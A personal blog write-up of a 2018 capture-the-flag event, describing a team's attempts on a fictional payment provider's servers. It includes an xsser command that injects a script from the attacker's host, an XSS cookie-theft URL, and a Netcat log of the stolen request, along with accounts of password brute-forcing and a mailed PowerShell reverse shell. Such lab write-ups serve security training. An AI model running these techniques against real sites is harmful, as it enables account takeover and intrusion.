CTF 2018: Write Up by Thomas Sluyter

Michael Tong Sang april 1, 2018

Cincero CTF036 – 2018 edition

2018-04-01 13:16:00

Image credits go to Cincero, who took photos all day.

Another year, another CTF036! No longer under the Ultimum flag, but this time organised by Cincero / Secured by Design. Same awesome people, different company name. The 2016 and 2017 editions were awesome and this year’s party lived up to its fame.

As is tradition, the AM was filled with presentations. I was invited to talk as well, but I didn’t have anything presentable ready to go; maybe next year! It was a busy day, and Wesley kicked off with DearBytes‘ findings about the security of home automation systems. Good talk, which had my colleague Dirk’s attention because his home is pretty heavily filled with that stuff 😉

Dick and I would be teaming up under the Unixerius flag. Lunch was sorted pretty quickly, so we set up our systems around 12:30. Between us two we had three laptops, with my burner laptop serving as Google-machine through my mobile data connection (the in-house Internet connection wasn’t very fast). The casus was consistent with the last years: a description of the target, an explanation why we were hacking their servers and a few leads to get us started. To sum it up:

  • An employee of a Internet payment provider (pay-deal.nl) has gambling debts and needs to pay them off. He’s struck a deal where the debts can be paid in credit card numbers, as opposed to actual money. We’ve been hired to grab as many credit card numbers as possible.
  • There’s a web server, www.pay-deal.nl. There’s a webmail box webmail.pay-deal.nl. Supposedly there are at least two workstations.

First order of business: slurp down anything the DNS would give us (a successful zone transfer showed just the four systems, spread across two ranges) and run some port scans against the front two boxen. Results?

  • The web server runs SMB shares which are accessible, as is the RDP server. Yikes, that’s bad. The host appears to run Windows Server 2008, with XAMPP.
  • The web site contains a direct-to-email contactform and a login page for a dashboard.
  • The mail box runs Squirrelmail, Postfix and a few other mail related services. My NMap scan was too limited, so it missed a “hidden” webapp running on port 1337 😀 At the end, Michael explained that this would have been a great spot to try a buffer overflow 🙂
  • Just like last year, enum4linux failed me completely. It suggested that SMB was working, but that there was no anymous access. It was only when Michael suggested that “I wouldn’t trust that output, why don’t you have another look?” that I tried smbclient, which was a lot more successful. The share contained seven cards: 70 points.

While perusing the website, we found a number of valid email addresses for employees to try on Squirrelmail. After going over my old OSCP notes, Dick put together a userlist and got to work with Hydra in hopes of brute-forcing passwords for their accounts. This is where the basic Kali stuff isn’t sufficient: there are no wordlists for Dutch targets 🙂 While rockyou.txt is awesome, it won’t contain famous passwords such as Welkom01, Maandag2018, Andijvie18 and so on. It’s time to start putting together a set of rules and wordlists for Dutch targets! In the end we got into two mailboxes, which got us another seven cards: 140 points.

Unfortunately we didn’t get any points beyond that, despite trying a lot of avenues!

Open SMB shares: Dirk suspected there was more to the open SMB shares, so he focused on those. Turning to Metasploit and others, he hoped to perform a SMB relay attack using the MSF tooling. Michael later confided that EternalBlue would not work (due to patching), but that the SMB redir was in fact the way to go. Unfortunately Dick couldn’t get this one to work; more troubleshooting needed.

Squirrelmail REXEC: Dick noticed that the Squirrelmail version was susceptible to a remote command execution vulnerability. Unfortunately, after quite a bit of trying he concluded that this particular install had been patched. Darn!

Mailing a script: In his own presentation Michael had stressed the importance of simulating human interaction in a CTF, be it through automation or by using a trainee 😉 After the rather hamfisted hints in the Squirrelmail boxes we’d opened, Dick decided to look for a Powershell reverse-shell script and to mail it to the guy waiting for “a script to run”. Not one minute before the final bell of the CTF did he get a reverse session! It didn’t count for points, but that was a nice find of him.

SQLi in the site: I ran the excellent SQLMap against all forms and variables that I could find in the site. No inroads found.

XSS in the site: Michael pointed out that one variable on the site should catch my eye, so I went over it all again. Turns out that hoedan.php?topic= is susceptible to cross-site scripting. This is where I needed to start learning, because I’m still an utter newb at this subject. I expected some analogue of SQLMap to exist for XSS and I wasn’t wrong! XSSER is a great tool that automates hunting for XSS vulnerabilities! Case in point:

$ xsser -u “http://www.pay-deal.nl” -g “/hoedan.php?topic=XSS” –auto –Fr “https://172.18.9.8/shell.js”

===========================================
[*] Final Results:
===========================================
– Injections: 558
– Failed: 528
– Sucessfull: 30
– Accur: 5 %

Here’s a great presentation by the author of XSSER: XSS for fun and profit.

This could be useful! Which is why I tried a few avenues. Using XSSER, Metasploit and some manual work I determined that the XSS wouldn’t allow me to run SQL commands, nor include any PHP. Javascript was the thing that was going to fly. Fair enough.

Now, that website contained a contact form which can be used to submit your own website for inclusion in the payment network. Sounds like a great way to get a “human” to visit your site.

Browser_autopwn: At first, I used SEToolkit and MSF to run attacks like browser_autopwn2, inserting my own workstations webserver and the relevant URL into the contact form. I certainly got visits and after some tweaking determined that the user came from one of the workstations and was running FireFox 51. Unfortunately, after trying many different payloads, none of them worked. So no go on pwning the browser on the workstation.

Grabbing dashboard cookies: Another great article I found helped me get on the way with this one: From reflected XSS to shell. My intention was to have the pay-deal administrator visit their own site (with XSS vuln), so I could grab their cookie in hopes of it having authentication information in there. Basically, like this:

http://www.pay-deal.nl/hoedan.php?topic=Registreren”>

While the attack worked and I did get a cookie barfed onto my Netcat listener, it did not contain any authenticating information for the site:

===========================================
connect to [172.18.9.8] from (UNKNOWN) [172.18.8.10] 55469
GET / HTTP/1.1
Host: 172.18.9.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: nl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
===========================================

Turns out I probably did something wrong, because according to Michael’s post-CTF talk this was indeed the inroad to be taken: grab the admin’s cookie, login to the dashboard, grab more credit cards and abuse the file upload tool for more LFI fun! Similarly, Dick’s attempts at the SMB relay should have also given him inroads to attack the box. We were well on our way, after a bunch of hints. So, we’re still pretty big newbs 😀

It was an awesome day! I wish I had more spare time, so I could continue the PWK/OSCP online labs and so I could play around with HackTheBox and VulnHub.

EDIT: Here’s a great SANS article explaining SMB relay in detail.

 

Source: Thomas’ personal website https://www.kilala.nl/index.php?id=2422